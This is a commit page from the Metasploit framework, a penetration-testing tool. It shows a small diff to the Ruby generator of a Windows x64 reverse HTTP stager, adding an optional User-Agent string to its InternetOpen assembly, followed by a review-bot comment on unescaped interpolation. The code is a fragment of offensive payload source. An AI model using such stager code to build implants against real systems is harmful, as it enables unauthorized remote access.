Landing rapid7#19726, fixed incorrect processing of HTTP User Agent p…
…arameter in x64 reverse HTTP payload (Windows)
msutovsky-r7 committed Dec 16, 2024
2 parents 50b1259 + 8af31e6 commit ebf7379
Showing 1 changed file with 15 additions and 2 deletions.
17 changes: 15 additions & 2 deletions lib/msf/core/payload/windows/x64/reverse_http_x64.rb
Expand Up @@ -62,7 +62,7 @@ def generate(opts={})
# Otherwise default to small URIs
conf[:url] = luri + generate_small_uri
end

generate_reverse_http(conf)
end

Expand Down Expand Up @@ -168,6 +168,7 @@ def asm_generate_ascii_array(str)
# @option opts [String] :url The URI to request during staging
# @option opts [String] :host The host to connect to
# @option opts [Integer] :port The port to connect to
# @option opts [String] :ua The User Agent the payload will use
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
# @option opts [String] :proxy_host The optional proxy server host to use
# @option opts [Integer] :proxy_port The optional proxy server port to use
Expand Down Expand Up @@ -245,9 +246,21 @@ def asm_reverse_http(opts={})
internetopen:
push rbx ; stack alignment
push rbx ; NULL pointer
mov rcx, rsp ; lpszAgent ("")
^

if opts[:ua]
asm << %Q^
call load_useragent
db"#{opts[:ua]}", 0x00
load_useragent:
pop rcx ; lpszAgent (stack pointer)
^
else
asm << %Q^
mov rcx, rsp ; lpszAgent("")
^
end

if proxy_enabled
asm << %Q^
push 3
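Review bot: In the new `if opts[:ua]` branch the User-Agent value is interpolated unescaped into the assembler source (`db"#{opts[:ua]}", 0x00`), so a value containing a double quote or a line break ends the string literal early, and the stub then fails to assemble or carries bytes other than the configured header. The file already defines `asm_generate_ascii_array` (named in the second hunk's header), which presumably emits a string as a byte list; if so, something like `db #{asm_generate_ascii_array(opts[:ua])}` would avoid the quoting problem, but check first whether that helper already appends the terminating zero. Otherwise the option should be validated before it reaches this template. The comment on `pop rcx` is also misleading, because the register receives the address of the `db` string that `call load_useragent` pushed rather than the stack pointer; `; lpszAgent (address of the string above)` would be more accurate. `asm_reverse_http` begins and ends outside this hunk, so anything the added bytes affect elsewhere, such as a size estimate, is not visible here.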